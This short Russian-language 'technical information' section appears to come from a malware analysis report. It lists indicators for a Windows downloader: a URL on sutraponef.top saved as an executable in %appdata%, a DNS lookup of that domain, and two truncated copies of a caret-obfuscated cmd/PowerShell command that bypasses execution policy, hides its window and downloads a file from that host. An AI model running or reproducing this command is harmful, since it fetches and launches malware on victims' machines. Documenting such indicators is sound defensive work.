Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powERS^he^LL.^e^x^E^ -e^XE^C^u^tIONpo^l^IC^y B^y^Pa^S^s ^-^n^o^pRO^f^I^LE^ ^-w^inDoW^s^TY^LE hID^DEN^ ^(N^E^W^-objE^cT^ sy^s^tEm.^n^et.W^ebCLIENT).DoWNlOAdf^ILE('http://sut...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "powERS^he^LL.^e^x^E^ -e^XE^C^u^tIONpo^l^IC^y B^y^Pa^S^s ^-^n^o^pRO^f^I^LE^ ^-w^inDoW^s^TY^LE hID^DEN^ ^(N^E^W^-objE^cT^ sy^s^tEm.^n^et.W^ebCLIENT).DoWNlOAdf^ILE('http://sut...' (со скрытым окном)